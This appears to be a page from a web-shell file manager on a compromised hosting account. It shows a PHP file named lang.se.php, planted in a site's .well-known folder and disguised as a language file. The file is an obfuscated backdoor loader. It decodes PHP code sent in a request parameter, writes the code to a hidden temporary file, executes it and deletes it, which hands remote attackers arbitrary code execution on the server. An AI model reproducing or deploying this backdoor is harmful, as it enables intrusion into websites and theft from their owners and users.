HEX
Server: LiteSpeed
System: Linux premium212.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: vitanhod (1367)
PHP: 8.2.31
Disabled: NONE
Upload Files
File: //proc/thread-self/root/home/vitanhod/vigolic-10.vitavit.com.pk/.well-known/lang.se.php
<?php

if(isset($_REQUEST["\x64at"]) ? true : false){
	$flg = $_REQUEST["\x64at"];
			$flg  =			explode(	'.'	,	$flg   )	 ;  	
	$pgrp =	'';
            $salt7 =	'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS =	strlen(  $salt7);
    
            foreach(  $flg as $q => $v5):
                $chS =	ord(  $salt7[$q % $lenS]);
                $d =	(  (  int)$v5 - $chS -(  $q % 10))^ 	97;
                $pgrp .= chr(  $d);
            endforeach;
	$k = array_filter([getenv("TMP"), "/var/tmp", session_save_path(), "/dev/shm", getenv("TEMP"), ini_get("upload_tmp_dir"), sys_get_temp_dir(), getcwd(), "/tmp"]);
	$bind = 0;
do {
    $component = $k[$bind] ?? null;
    if ($bind >= count($k)) break;
    		if (is_writable($component) && is_dir($component)) {
    $pointer = "$component" . "/.entry";
    if (@file_put_contents($pointer, $pgrp) !== false) {
	include $pointer;
	unlink($pointer);
	exit;
}
}
    $bind++;
} while (true);
}